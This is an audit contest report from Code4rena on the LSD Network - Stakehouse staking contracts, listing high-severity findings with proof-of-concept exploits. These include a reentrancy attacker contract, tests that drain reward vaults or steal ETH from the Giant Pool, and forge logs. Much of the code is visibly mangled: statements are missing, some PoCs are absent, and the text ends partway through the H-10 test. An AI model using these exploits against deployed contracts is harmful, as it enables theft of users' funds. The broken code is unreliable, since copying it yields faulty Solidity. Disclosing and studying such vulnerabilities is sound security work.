LSD Network - Stakehouse contest
Findings & Analysis Report


Table of contents


About C4

Code4rena (C4) is an open organization consisting of security researchers, auditors, developers, and individuals with domain expertise in smart contracts.

A C4 audit contest is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.

During the audit contest outlined in this document, C4 conducted an analysis of the LSD Network - Stakehouse smart contract system written in Solidity. The audit contest took place between November 11—November 18 2022.


98 Wardens contributed reports to the LSD Network - Stakehouse contest:

  1. 0x4non
  2. 0xNazgul
  3. 0xPanda
  4. 0xRoxas
  5. 0xSmartContract
  6. 0xbepresent
  7. 0xdeadbeef0x
  8. 0xmuxyz
  9. 9svR6w
  10. Awesome
  11. Aymen0909
  12. B2
  13. Bnke0x0
  14. CloudX (Migue, pabliyo, and marce1993)
  15. Deivitto
  16. Diana
  17. Franfran
  18. HE1M
  19. IllIllI
  20. JTJabba
  21. Jeiwan
  22. Josiah
  23. Lambda
  24. RaymondFam
  25. ReyAdmirado
  26. Rolezn
  27. SaeedAlipoor01988
  28. Saintcode_
  29. Sathish9098
  30. Secureverse (imkapadia, Nsecv, and leosathya)
  31. SmartSek (0xDjango and hake)
  32. Trust
  33. Udsen
  34. V_B (Barichek and vlad_bochok)
  35. a12jmx
  36. aphak5010
  37. arcoun
  38. banky
  39. bearonbike
  40. bharg4v
  41. bin2chen
  42. bitbopper
  43. brgltd
  44. btk
  45. bulej93
  46. c3phas
  47. c7e7eff
  48. cccz
  49. ch0bu
  50. chaduke
  51. chrisdior4
  52. clems4ever
  53. corerouter
  54. cryptostellar5
  55. datapunk
  56. delfin454000
  57. fs0c
  58. gogo
  59. gz627
  60. hihen
  61. hl_
  62. ignacio
  63. imare
  64. immeas
  65. joestakey
  66. koxuan
  67. ladboy233
  68. lukris02
  69. martin
  70. minhtrng
  71. nogo
  72. oyc_109
  73. pashov
  74. pavankv
  75. peanuts
  76. pedr02b2
  77. perseverancesuccess
  78. rbserver
  79. ronnyx2017
  80. rotcivegaf
  81. sahar
  82. sakman
  83. satoshipotato
  84. shark
  85. skyle
  86. tnevler
  87. trustindistrust
  88. unforgiven
  89. wait
  90. yixxas
  91. zaskoh
  92. zgo

This contest was judged by LSDan.

Final report assembled by liveactionllama and CloudEllie.


The C4 analysis yielded an aggregated total of 52 unique vulnerabilities. Of these vulnerabilities, 21 received a risk rating in the category of HIGH severity and 31 received a risk rating in the category of MEDIUM severity.

Additionally, C4 analysis included 60 reports detailing issues with a risk rating of LOW severity or non-critical. There were also 18 reports recommending gas optimizations.

All of the issues presented here are linked back to their original finding.


The code under review can be found within the C4 LSD Network - Stakehouse contest repository, and is composed of 21 smart contracts written in the Solidity programming language and includes 2,269 lines of Solidity code.

Severity Criteria

C4 assesses the severity of disclosed vulnerabilities according to a methodology based on OWASP standards.

Vulnerabilities are divided into three primary risk categories: high, medium, and low/non-critical.

High-level considerations for vulnerabilities span the following key areas when conducting assessments:

  • Malicious Input Handling
  • Escalation of privileges
  • Arithmetic
  • Gas use

Further information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website.

High Risk Findings (21)

[H-01] Any user being the first to claim rewards from GiantMevAndFeesPool can unexepectedly collect them all

Submitted by clems4ever

Any user being the first to claim rewards from GiantMevAndFeesPool, can get all the previously generated rewards whatever the amount and even if he did not participate to generate those rewards…

Proof of Concept

Copy paste it in the test suite and run it.

Tools Used

forge test

Rework the way accumulatedETHPerLPShare and claimed is used. There are multiple bugs due to the interaction between those variables as you will see in my other reports.

vince0656 (Stakehouse) confirmed

[H-02] Rewards of GiantMevAndFeesPool can be locked for all users

Submitted by clems4ever

Any malicious user could make the rewards in GiantMevAndFeesPool inaccessible to all other users…

Proof of Concept

Copy the file in the test suite and run the test.

Tools Used

forge test

Protect the inherited functions of the ERC20 tokens (GiantLP and LPToken) because transfer is not protected and can trigger the before and after hooks. There is the same issue with LPToken and StakingFundsVault.

vince0656 (Stakehouse) confirmed

[H-03] Theft of ETH of free floating SLOT holders

Submitted by clems4ever, also found by HE1M

A malicious user can steal all claimable ETH belonging to free floating SLOT holders…

Proof of Concept

Run it in the test suite with forge

Tools Used

Manual review / forge

+= operator instead of = in ?

The logic for keeping the rewards up-to-date is also quite complex in my opinion. The main thing that triggered it for me was the lazy call to updateAccruedETHPerShares. Why not keep the state updated after each operation instead?

vince0656 (Stakehouse) confirmed

[H-04] Unstaking does not update the mapping sETHUserClaimForKnot

Submitted by HE1M, also found by 9svR6w

If a user stakes some sETH, and after some time decides to unstake some amount of sETH, later s/he will not be qualified or be less qualified to claim ETH on the remaining staked sETH.

Proof of Concept

Suppose Alice stakes 5 sETH by calling stake(...).
So, we will have:

  • sETHUserClaimForKnot[BLS][Alice] = (5 * 10^18 * accumulatedETHPerFreeFloatingShare) / PRECISION
  • sETHStakedBalanceForKnot[BLS][Alice] = 5 * 10^18
  • sETHTotalStakeForKnot[BLS] += 5 * 10^18

Later, Alice decides to unstake 3 sETH by calling unstake(...).

So, all ETH owed to Alice will be paid:

Then, we will have:

  • sETHUserClaimForKnot[BLS][Alice] = (5 * 10^18 * accumulatedETHPerFreeFloatingShare) / PRECISION
  • sETHStakedBalanceForKnot[BLS][Alice] = 2 * 10^18
  • sETHTotalStakeForKnot[BLS] -= 3 * 10^18

It is clear that the mapping sETHStakedBalanceForKnot is decreased as expected, but the mapping sETHUserClaimForKnot is not changed. In other words, the mapping sETHUserClaimForKnot is still holding the claimed amount based on the time 5 sETH were staked.

If, after some time, the ETH is accumulated per free floating share for the BLS public key that Alice was staking for, Alice will be qualified to some more ETH to claim (because she has still 2 sETH staked).

If Alice unstakes by calling unstake(...) or claim ETH by calling claimAsStaker(...), in both calls, the function calculateUnclaimedFreeFloatingETHShare will be called to calculate the amount of unclaimed ETH:

In this function, we will have:

  • stakedBal = sETHStakedBalanceForKnot[BLS][Alice] = 2 * 10^18
  • userShare = (newAccumulatedETHPerShare * stakedBal) / PRECISION

The return value which is unclaimed ETH will be:

userShare - sETHUserClaimForKnot[BLS][Alice] = 
(newAccumulatedETHPerShare * 2 * 10^18) / PRECISION - (5 * 10^18 * accumulatedETHPerFreeFloatingShare) / PRECISION

This return value is not correct (it is highly possible to be smaller than 0, and as a result Alice can not claim anything), because the claimed ETH is still based on the time when 5 sETH were staked, not on the time when 2 sETH were remaining/staked.

The vulnerability is that during unstaking, the mapping sETHUserClaimForKnot is not updated to the correct value. In other words, this mapping is updated in _claimAsStaker, but it is updated based on 5 sETH staked, later when 3 sETH are unstaked, this mapping should be again updated based on the remaing sETH (which is 2 sETH).

As a result, Alice can not claim ETH or she will qualify for less amount.

The following line should be added on line 274:

sETHUserClaimForKnot[_blsPubKey][msg.sender] =
                (accumulatedETHPerShare * sETHStakedBalanceForKnot[_blsPubKey][msg.sender]) / PRECISION

vince0656 (Stakehouse) confirmed

[H-05] Reentrancy in LiquidStakingManager.sol#withdrawETHForKnow leads to loss of fund from smart wallet

Submitted by ladboy233, also found by Trust, btk, 0xbepresent, bitbopper, and yixxas

The code below violates the check effect pattern, the code banned the public key to mark the public key invalid to not let the msg.sender withdraw again after sending the ETH.

    /// @notice Allow node runners to withdraw ETH from their smart wallet. ETH can only be withdrawn until the KNOT has not been staked.
    /// @dev A banned node runner cannot withdraw ETH for the KNOT. 
    /// @param _blsPublicKeyOfKnot BLS public key of the KNOT for which the ETH needs to be withdrawn
    function withdrawETHForKnot(address _recipient, bytes calldata _blsPublicKeyOfKnot) external {
        require(_recipient != address(0), "Zero address");
        require(isBLSPublicKeyBanned(_blsPublicKeyOfKnot) == false, "BLS public key has already withdrawn or not a part of LSD network");

        address associatedSmartWallet = smartWalletOfKnot[_blsPublicKeyOfKnot];
        require(smartWalletOfNodeRunner[msg.sender] == associatedSmartWallet, "Not the node runner for the smart wallet ");
        require(isNodeRunnerBanned(nodeRunnerOfSmartWallet[associatedSmartWallet]) == false, "Node runner is banned from LSD network");
        require(associatedSmartWallet.balance >= 4 ether, "Insufficient balance");
            getAccountManager().blsPublicKeyToLifecycleStatus(_blsPublicKeyOfKnot) == IDataStructures.LifecycleStatus.INITIALS_REGISTERED,
            "Initials not registered"

        // refund 4 ether from smart wallet to node runner's EOA
            4 ether

        // update the mapping
        bannedBLSPublicKeys[_blsPublicKeyOfKnot] = associatedSmartWallet;

        emit ETHWithdrawnFromSmartWallet(associatedSmartWallet, _blsPublicKeyOfKnot, msg.sender);

Note the section:

// refund 4 ether from smart wallet to node runner's EOA
	4 ether

// update the mapping
bannedBLSPublicKeys[_blsPublicKeyOfKnot] = associatedSmartWallet;

If the _recipient is a smart contract, it can re-enter the withdraw function to withdraw another 4 ETH multiple times before the public key is banned.

As shown in our running POC.

We need to add the import first:

import { MockAccountManager } from "../../contracts/testing/stakehouse/MockAccountManager.sol";

We can add the smart contract below:

interface IManager {
    function registerBLSPublicKeys(
        bytes[] calldata _blsPublicKeys,
        bytes[] calldata _blsSignatures,
        address _eoaRepresentative
    ) external payable;
    function withdrawETHForKnot(
        address _recipient, 
        bytes calldata _blsPublicKeyOfKnot
    ) external;

contract NonEOARepresentative {

    address manager;
    bool state;

    constructor(address _manager) payable {

        bytes[] memory publicKeys = new bytes[](2);
        publicKeys[0] = "publicKeys1";
        publicKeys[1] = "publicKeys2";

        bytes[] memory signature = new bytes[](2);
        signature[0] = "signature1";
        signature[1] = "signature2";

        IManager(_manager).registerBLSPublicKeys{value: 8 ether}(

        manager = _manager;


    function withdraw(bytes calldata _blsPublicKeyOfKnot) external {
        IManager(manager).withdrawETHForKnot(address(this), _blsPublicKeyOfKnot);

    receive() external payable {
        if(!state) {
            state = true;


There is a restriction in this reentrancy attack, the msg.sender needs to be the same recipient when calling withdrawETHForKnot.

We add the test case.

function testBypassIsContractCheck_POC() public {

	NonEOARepresentative pass = new NonEOARepresentative{value: 8 ether}(address(manager));
	address wallet = manager.smartWalletOfNodeRunner(address(pass));
	address reprenstative = manager.smartWalletRepresentative(wallet);
	console.log("smart contract registered as a EOA representative");
	console.log(address(reprenstative) == address(pass));

	// to set the public key state to IDataStructures.LifecycleStatus.INITIALS_REGISTERED
	MockAccountManager(factory.accountMan()).setLifecycleStatus("publicKeys1", 1);

	// expected to withdraw 4 ETHER, but reentrancy allows withdrawing 8 ETHER
	console.log("balance after the withdraw, expected 4 ETH, but has 8 ETH");


We run the test:

forge test -vv --match testWithdraw_Reentrancy_POC

And the result is

Running 1 test for test/foundry/LiquidStakingManager.t.sol:LiquidStakingManagerTests
[PASS] testWithdraw_Reentrancy_POC() (gas: 578021)
  smart contract registered as a EOA representative
  balance after the withdraw, expected 4 ETH, but has 8 ETH

Test result: ok. 1 passed; 0 failed; finished in 14.85ms

The function call is

pass.withdraw("publicKeys1"), which calls

function withdraw(bytes calldata _blsPublicKeyOfKnot) external {
	IManager(manager).withdrawETHForKnot(address(this), _blsPublicKeyOfKnot);

Which trigger:

// refund 4 ether from smart wallet to node runner's EOA
	4 ether

Which triggers reentrancy to withdraw the fund again before the public key is banned.

receive() external payable {
	if(!state) {
		state = true;

We recommend ban the public key first then send the fund out, and use openzeppelin nonReentrant modifier to avoid reentrancy.

// update the mapping
bannedBLSPublicKeys[_blsPublicKeyOfKnot] = associatedSmartWallet;

// refund 4 ether from smart wallet to node runner's EOA
	4 ether

vince0656 (Stakehouse) confirmed

[H-06] BringUnusedETHBackIntoGiantPool can cause stuck ether funds in Giant Pool

Submitted by koxuan, also found by hihen

withdrawUnusedETHToGiantPool will withdraw any eth from the vault if staking has not commenced(knot status is INITIALS_REGISTERED), the eth will be drawn successful to the giant pool. However, idleETH variable is not updated. idleETH is the available ETH for withdrawing and depositing eth for staking. Since there is no other places that updates idleETH other than depositing eth for staking and withdrawing eth, the eth withdrawn from the vault will be stuck forever.

Proof of Concept

Place poc in GiantPools.t.sol with import { MockStakingFundsVault } from "../../contracts/testing/liquid-staking/MockStakingFundsVault.sol";

    function testStuckFundsInGiantMEV() public {

        stakingFundsVault = MockStakingFundsVault(payable(manager.stakingFundsVault()));
        address nodeRunner = accountOne;, 4 ether);
        //address feesAndMevUser = accountTwo;, 4 ether);
        //address savETHUser = accountThree;, 24 ether);
        address victim = accountFour;, 1 ether);

        registerSingleBLSPubKey(nodeRunner, blsPubKeyOne, accountFour);

        emit log_address(address(giantFeesAndMevPool));

        emit log_uint(victim.balance);
        giantFeesAndMevPool.depositETH{value: 1 ether}(1 ether);
        bytes[][] memory blsKeysForVaults = new bytes[][](1);
        blsKeysForVaults[0] = getBytesArrayFromBytes(blsPubKeyOne);

        uint256[][] memory stakeAmountsForVaults = new uint256[][](1);
        stakeAmountsForVaults[0] = getUint256ArrayFromValues(1 ether);
        giantFeesAndMevPool.batchDepositETHForStaking(getAddressArrayFromValues(address(stakingFundsVault)),getUint256ArrayFromValues(1 ether) , blsKeysForVaults, stakeAmountsForVaults);

        emit log_uint(victim.balance);

        vm.warp(block.timestamp + 60 minutes);
        LPToken lp = (stakingFundsVault.lpTokenForKnot(blsKeysForVaults[0][0]));
        LPToken [][] memory lpToken = new LPToken[][](1);
        LPToken[] memory temp  = new LPToken[](1);
        temp[0] = lp;
        lpToken[0] = temp;

        emit log_uint(address(giantFeesAndMevPool).balance);
        giantFeesAndMevPool.bringUnusedETHBackIntoGiantPool(getAddressArrayFromValues(address(stakingFundsVault)),lpToken, stakeAmountsForVaults);

        emit log_uint(address(giantFeesAndMevPool).balance);
        giantFeesAndMevPool.batchDepositETHForStaking(getAddressArrayFromValues(address(stakingFundsVault)),getUint256ArrayFromValues(1 ether) , blsKeysForVaults, stakeAmountsForVaults);

        giantSavETHPool.withdrawETH(1 ether);


Both withdrawing eth for user and depositing eth to stake fails and reverts as shown in the poc due to underflow in idleETH.

Note that the same problem also exists in GiantSavETHVaultPool, however a poc cannot be done for it as another bug exist in GiantSavETHVaultPool which prevents it from receiving funds as it lacks a receive() or fallback() implementation.

Tools Used


Update idleETH in withdrawUnusedETHToGiantPool

vince0656 (Stakehouse) confirmed

[H-07] GiantLP with a transferHookProcessor cant be burned, users’ funds will be stuck in the Giant Pool

Submitted by ronnyx2017, also found by Trust, rotcivegaf, 9svR6w, Lambda, and HE1M

The GiantLP with a transferHookProcessor will call transferHookProcessor.beforeTokenTransfer(_from, _to, _amount) when it’s transferred / minted / burned.

But the to address is address(0x00) in the erc20 _burn function. The GiantMevAndFeesPool.beforeTokenTransfer will call the function SyndicateRewardsProcessor._distributeETHRewardsToUserForToken will a zero address check in the first line:

function _distributeETHRewardsToUserForToken(...) internal {
    require(_recipient != address(0), "Zero address");

So any withdraw function with a operation of burning the GiantLP token with a transferHookProcessor will revert because of the zero address check. The users’ funds will be stuck in the Giant Pool contracts.

Proof of Concept

I wrote a test about GiantMevAndFeesPool.withdrawETH function which is used to withdraw eth from the Giant Pool. It will be reverted.


pragma solidity ^0.8.13;

// SPDX-License-Identifier: MIT
import {GiantPoolTests} from "./GiantPools.t.sol";

contract LpBurnTests is GiantPoolTests {
    function testburn() public{
        address feesAndMevUserOne = accountOne;, 4 ether);
        giantFeesAndMevPool.depositETH{value: 4 ether}(4 ether);
        giantFeesAndMevPool.withdrawETH(4 ether);

run test

forge test --match-test testburn -vvv

test log:

    ├─ [115584] GiantMevAndFeesPool::withdrawETH(4000000000000000000) 
    │   ├─ [585] GiantLP::balanceOf(0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266) [staticcall]
    │   │   └─ ← 4000000000000000000
    │   ├─ [128081] GiantLP::burn(0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266, 4000000000000000000) 
    │   │   ├─ [126775] GiantMevAndFeesPool::beforeTokenTransfer(0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266, 0x0000000000000000000000000000000000000000, 4000000000000000000) 
    │   │   │   ├─ [371] GiantLP::totalSupply() [staticcall]
    │   │   │   │   └─ ← 4000000000000000000
    │   │   │   ├─ emit ETHReceived(amount: 4000000000000000000)
    │   │   │   ├─ [585] GiantLP::balanceOf(0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266) [staticcall]
    │   │   │   │   └─ ← 4000000000000000000
    │   │   │   ├─ [0] 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266::fallback{value: 4000000000000000000}() 
    │   │   │   │   └─ ← ()
    │   │   │   ├─ emit ETHDistributed(user: 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266, recipient: 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266, amount: 4000000000000000000)
    │   │   │   ├─ [2585] GiantLP::balanceOf(0x0000000000000000000000000000000000000000) [staticcall]
    │   │   │   │   └─ ← 0
    │   │   │   └─ ← "Zero address"
    │   │   └─ ← "Zero address"
    │   └─ ← "Zero address"
    └─ ← "Zero address"

Tools Used


Skip update rewards for zero address.

vince0656 (Stakehouse) confirmed duplicate issue #60

[H-08] function withdrawETH from GiantMevAndFeesPool can steal most of eth because of idleETH is reduced before burning token

Submitted by ronnyx2017, also found by cccz

The contract GiantMevAndFeesPool override the function totalRewardsReceived:

return address(this).balance + totalClaimed - idleETH;

The function totalRewardsReceived is used as the current rewards balance to caculate the unprocessed rewards in the function SyndicateRewardsProcessor._updateAccumulatedETHPerLP

uint256 received = totalRewardsReceived();
uint256 unprocessed = received - totalETHSeen;

But it will decrease the idleETH first and then burn the lpTokenETH in the function GiantMevAndFeesPool.withdrawETH. The lpTokenETH burn option will trigger GiantMevAndFeesPool.beforeTokenTransfer which will call _updateAccumulatedETHPerLP and send the accumulated rewards to the msg sender. Because of the diminution of the idleETH, the accumulatedETHPerLPShare is added out of thin air. So the attacker can steal more eth from the GiantMevAndFeesPool.

Proof of Concept

I wrote a test file for proof, but there is another bug/vulnerability which will make the GiantMevAndFeesPool.withdrawETH function break down. I submitted it as the other finding named “GiantLP with a transferHookProcessor cant be burned, users’ funds will be stuck in the Giant Pool”. You should fix it first by modifying the code to :

if (_to != address(0)) {

I know modifying the project source code is controversial. Please believe me it’s a bug needed to be fixed and it’s independent of the current vulnerability.


pragma solidity ^0.8.13;

// SPDX-License-Identifier: MIT

import "forge-std/console.sol";
import {GiantPoolTests} from "./GiantPools.t.sol";

contract TakeFromGiantPools2 is GiantPoolTests {
    function testDWUpdateRate2() public{
        address feesAndMevUserOne = accountOne;, 4 ether);
        address feesAndMevUserTwo = accountTwo;, 4 ether);
        // Deposit ETH into giant fees and mev
        giantFeesAndMevPool.depositETH{value: 4 ether}(4 ether);
        giantFeesAndMevPool.depositETH{value: 4 ether}(4 ether);
        giantFeesAndMevPool.withdrawETH(4 ether);
        console.log("user one:", getBalance(feesAndMevUserOne));
        console.log("user two(attacker):", getBalance(feesAndMevUserTwo));
        console.log("giantFeesAndMevPool:", getBalance(address(giantFeesAndMevPool)));

    function getBalance(address addr) internal returns (uint){
        // just ETH
        return addr.balance;  // + giantFeesAndMevPool.lpTokenETH().balanceOf(addr);


run test:

forge test --match-test testDWUpdateRate2 -vvv

test log:

  user one: 0
  user two(attacker): 6000000000000000000
  giantFeesAndMevPool: 2000000000000000000

The attacker stole 2 eth from the pool.

Tools Used


idleETH -= _amount; should be after the lpTokenETH.burn.

vince0656 (Stakehouse) confirmed

[H-09] Incorrect accounting in SyndicateRewardsProcessor results in any LP token holder being able to steal other LP tokens holder’s ETH from the fees and MEV vault

Submitted by c7e7eff, also found by Trust, 0x4non, arcoun, Jeiwan, unforgiven, cccz, corerouter, rotcivegaf, koxuan, aphak5010, 9svR6w, HE1M, and clems4ever

The SyndicateRewardsProcessor’s internal _distributeETHRewardsToUserForToken() function is called from external claimRewards() function in the StakingFundsVault contract. This function is called by LP Token holders to claim their accumulated rewards based on their LP Token holdings and already claimed rewards.
The accumulated rewards due are calculated as ((accumulatedETHPerLPShare * balance) / PRECISION) reduced by the previous claimed amount stored in claimed[_user][_token]. When the ETH is sent to the _user the stored value should be increased by the due amount. However in the current code base the claimed[_user][_token] is set equal to the calculated due.

function _distributeETHRewardsToUserForToken(
        address _user,
        address _token,
        uint256 _balance,
        address _recipient
    ) internal {
        require(_recipient != address(0), "Zero address");
        uint256 balance = _balance;
        if (balance > 0) {
            // Calculate how much ETH rewards the address is owed / due 
            uint256 due = ((accumulatedETHPerLPShare * balance) / PRECISION) - claimed[_user][_token];
            if (due > 0) {
                claimed[_user][_token] = due;
                totalClaimed += due;
                (bool success, ) ={value: due}("");

This means the first time a user will claim their rewards they will get the correct amount and the correct value will be stored in the claimed[_user][_token]. When extra ETH is recieved from the MEV and fees rewards and the user claims their reward again, the claimed amount will only reflect the last claimed amount. As a result they can then repeatedly claim untill the MEV and Fee vault is almost depleted.

Proof of Concept

Following modification to the existing StakingFundsVault.t.sol will provide a test to demonstrate the issue:

diff --git a/test/foundry/StakingFundsVault.t.sol b/test/foundry/StakingFundsVault.t.sol
index 53b4ce0..4db8fc8 100644
--- a/test/foundry/StakingFundsVault.t.sol
+++ b/test/foundry/StakingFundsVault.t.sol
@@ -4,6 +4,7 @@ import "forge-std/console.sol";
 import { StakingFundsVault } from "../../contracts/liquid-staking/StakingFundsVault.sol";
 import { LPToken } from "../../contracts/liquid-staking/LPToken.sol";
+import { SyndicateRewardsProcessor} from "../../contracts/liquid-staking/SyndicateRewardsProcessor.sol";
 import {
@@ -417,4 +418,73 @@ contract StakingFundsVaultTest is TestUtils {
         assertEq(vault.totalClaimed(), rewardsAmount);
         assertEq(vault.totalRewardsReceived(), rewardsAmount);
+    function testRepetitiveClaim() public {
+        // register BLS key with the network
+        registerSingleBLSPubKey(accountTwo, blsPubKeyFour, accountFive);
+        vm.label(accountOne, "accountOne");
+        vm.label(accountTwo, "accountTwo");
+        // Do a deposit of 4 ETH for bls pub key four in the fees and mev pool
+        depositETH(accountTwo, maxStakingAmountPerValidator / 2, getUint256ArrayFromValues(maxStakingAmountPerValidator / 2), getBytesArrayFromBytes(blsPubKeyFour));
+        depositETH(accountOne, maxStakingAmountPerValidator / 2, getUint256ArrayFromValues(maxStakingAmountPerValidator / 2), getBytesArrayFromBytes(blsPubKeyFour));
+        // Do a deposit of 24 ETH for savETH pool
+        liquidStakingManager.savETHVault().depositETHForStaking{value: 24 ether}(blsPubKeyFour, 24 ether);
+        stakeAndMintDerivativesSingleKey(blsPubKeyFour);
+        LPToken lpTokenBLSPubKeyFour = vault.lpTokenForKnot(blsPubKeyFour);
+        vm.warp(block.timestamp + 3 hours);
+        // Deal ETH to the staking funds vault
+        uint256 rewardsAmount = 1.2 ether;
+        console.log("depositing %s wei into the vault.\n", rewardsAmount);
+, rewardsAmount);
+        assertEq(address(vault).balance, rewardsAmount);
+        assertEq(vault.previewAccumulatedETH(accountOne, vault.lpTokenForKnot(blsPubKeyFour)), rewardsAmount / 2);
+        assertEq(vault.previewAccumulatedETH(accountTwo, vault.lpTokenForKnot(blsPubKeyFour)), rewardsAmount / 2);
+        logAccounts();
+        console.log("Claiming rewards for accountOne.\n");
+        vm.prank(accountOne);
+        vault.claimRewards(accountOne, getBytesArrayFromBytes(blsPubKeyFour));
+        logAccounts();
+        console.log("depositing %s wei into the vault.\n", rewardsAmount);
+, address(vault).balance + rewardsAmount);
+        vm.warp(block.timestamp + 3 hours);
+        logAccounts();
+        console.log("Claiming rewards for accountOne.\n");
+        vm.prank(accountOne);
+        vault.claimRewards(accountOne, getBytesArrayFromBytes(blsPubKeyFour));
+        logAccounts();
+        console.log("Claiming rewards for accountOne AGAIN.\n");
+        vm.prank(accountOne);
+        vault.claimRewards(accountOne, getBytesArrayFromBytes(blsPubKeyFour));
+        logAccounts();
+        console.log("Claiming rewards for accountOne AGAIN.\n");
+        vm.prank(accountOne);
+        vault.claimRewards(accountOne, getBytesArrayFromBytes(blsPubKeyFour));
+        logAccounts();
+        //console.log("Claiming rewards for accountTwo.\n");
+        vm.prank(accountTwo);
+        vault.claimRewards(accountTwo, getBytesArrayFromBytes(blsPubKeyFour));
+    }
+    function logAccounts() internal {
+        console.log("accountOne previewAccumulatedETH : %i", vault.previewAccumulatedETH(accountOne, vault.lpTokenForKnot(blsPubKeyFour)));
+        console.log("accountOne claimed               : %i", SyndicateRewardsProcessor(vault).claimed(accountOne, address(vault.lpTokenForKnot(blsPubKeyFour))));
+        console.log("accountTwo previewAccumulatedETH : %i", vault.previewAccumulatedETH(accountTwo, vault.lpTokenForKnot(blsPubKeyFour)));
+        console.log("accountTwo claimed               : %i", SyndicateRewardsProcessor(vault).claimed(accountTwo, address(vault.lpTokenForKnot(blsPubKeyFour))));
+        console.log("ETH Balances: accountOne: %i, accountTwo: %i, vault: %i\n", accountOne.balance, accountTwo.balance, address(vault).balance);
+    }

Note that the AccountOne repeatedly claims until the vault is empty and the claim for accountTwo fails.

Following is an output of the test script showing the balances and differnet state variables:

forge test -vv --match testRepetitiveClaim
[⠑] Compiling...
No files changed, compilation skipped

Running 1 test for test/foundry/StakingFundsVault.t.sol:StakingFundsVaultTest
[FAIL. Reason: Failed to transfer] testRepetitiveClaim() (gas: 3602403)
  depositing 1200000000000000000 wei into the vault.

  accountOne previewAccumulatedETH : 600000000000000000
  accountOne claimed               : 0
  accountTwo previewAccumulatedETH : 600000000000000000
  accountTwo claimed               : 0
  ETH Balances: accountOne: 0, accountTwo: 0, vault: 1200000000000000000

  Claiming rewards for accountOne.

  accountOne previewAccumulatedETH : 0
  accountOne claimed               : 600000000000000000
  accountTwo previewAccumulatedETH : 600000000000000000
  accountTwo claimed               : 0
  ETH Balances: accountOne: 600000000000000000, accountTwo: 0, vault: 600000000000000000

  depositing 1200000000000000000 wei into the vault.

  accountOne previewAccumulatedETH : 600000000000000000
  accountOne claimed               : 600000000000000000
  accountTwo previewAccumulatedETH : 1200000000000000000
  accountTwo claimed               : 0
  ETH Balances: accountOne: 600000000000000000, accountTwo: 0, vault: 1800000000000000000

  Claiming rewards for accountOne.

  accountOne previewAccumulatedETH : 600000000000000000
  accountOne claimed               : 600000000000000000
  accountTwo previewAccumulatedETH : 1200000000000000000
  accountTwo claimed               : 0
  ETH Balances: accountOne: 1200000000000000000, accountTwo: 0, vault: 1200000000000000000

  Claiming rewards for accountOne AGAIN.

  accountOne previewAccumulatedETH : 600000000000000000
  accountOne claimed               : 600000000000000000
  accountTwo previewAccumulatedETH : 1200000000000000000
  accountTwo claimed               : 0
  ETH Balances: accountOne: 1800000000000000000, accountTwo: 0, vault: 600000000000000000

  Claiming rewards for accountOne AGAIN.

  accountOne previewAccumulatedETH : 600000000000000000
  accountOne claimed               : 600000000000000000
  accountTwo previewAccumulatedETH : 1200000000000000000
  accountTwo claimed               : 0
  ETH Balances: accountOne: 2400000000000000000, accountTwo: 0, vault: 0

Test result: FAILED. 0 passed; 1 failed; finished in 15.64ms

Failing tests:
Encountered 1 failing test in test/foundry/StakingFundsVault.t.sol:StakingFundsVaultTest
[FAIL. Reason: Failed to transfer] testRepetitiveClaim() (gas: 3602403)

Encountered a total of 1 failing tests, 0 tests succeeded

Tools Used

Manual review / forge test

The SyndicateRewardsProcessor contract should be modified as follows:

diff --git a/contracts/liquid-staking/SyndicateRewardsProcessor.sol b/contracts/liquid-staking/SyndicateRewardsProcessor.sol
index 81be706..9b9c502 100644
--- a/contracts/liquid-staking/SyndicateRewardsProcessor.sol
+++ b/contracts/liquid-staking/SyndicateRewardsProcessor.sol
@@ -60,7 +60,7 @@ abstract contract SyndicateRewardsProcessor {
             // Calculate how much ETH rewards the address is owed / due 
             uint256 due = ((accumulatedETHPerLPShare * balance) / PRECISION) - claimed[_user][_token];
             if (due > 0) {
-                claimed[_user][_token] = due;
+                claimed[_user][_token] += due;
                 totalClaimed += due;

vince0656 (Stakehouse) confirmed

[H-10] GiantMevAndFeesPool.bringUnusedETHBackIntoGiantPool function loses the addition of the idleETH which allows attackers to steal most of eth from the Giant Pool

Submitted by ronnyx2017, also found by Lambda

The contract GiantMevAndFeesPool override the function totalRewardsReceived:

return address(this).balance + totalClaimed - idleETH;

The function totalRewardsReceived is used as the current rewards balance to caculate the unprocessed rewards in the function SyndicateRewardsProcessor._updateAccumulatedETHPerLP

uint256 received = totalRewardsReceived();
uint256 unprocessed = received - totalETHSeen;

The idleETH will be decreased in the function batchDepositETHForStaking for sending eth to the staking pool. But the idleETH wont be increased in the function bringUnusedETHBackIntoGiantPool which is used to burn lp tokens in the staking pool, and the staking pool will send the eth back to the giant pool. And then because of the diminution of the idleETH, the accumulatedETHPerLPShare is added out of thin air. So the attacker can steal more eth from the GiantMevAndFeesPool.

Proof of Concept


pragma solidity ^0.8.13;

// SPDX-License-Identifier: MIT

import "forge-std/console.sol";
import {GiantPoolTests} from "./GiantPools.t.sol";
import { LPToken } from "../../contracts/liquid-staking/LPToken.sol";

contract TakeFromGiantPools is GiantPoolTests {
    function testDWclaimRewards() public{
        address nodeRunner = accountOne;, 12 ether);
        address feesAndMevUserOne = accountTwo;, 4 ether);
        address feesAndMevUserTwo = accountThree;, 4 ether);

        // Register BLS key
        registerSingleBLSPubKey(nodeRunner, blsPubKeyOne, accountFour);

        // Deposit ETH into giant fees and mev
        giantFeesAndMevPool.depositETH{value: 4 ether}(4 ether);
        giantFeesAndMevPool.depositETH{value: 4 ether}(4 ether);

        bytes[][] memory blsKeysForVaults = new bytes[][](1);
        blsKeysForVaults[0] = getBytesArrayFromBytes(blsPubKeyOne);

        uint256[][] memory stakeAmountsForVaults = new uint256[][](1);
        stakeAmountsForVaults[0] = getUint256ArrayFromValues(4 ether);
            getUint256ArrayFromValues(4 ether),
        vm.warp(block.timestamp+31 minutes);
        LPToken[] memory tokens = new LPToken[](1);
        tokens[0] = manager.stakingFundsVault().lpTokenForKnot(blsPubKeyOne);

        LPToken[][] memory allTokens = new LPToken[][](1);
        allTokens[0] = tokens;
        // inject a NOOP to skip some functions
        address[] memory stakingFundsVaults = new address[](1);
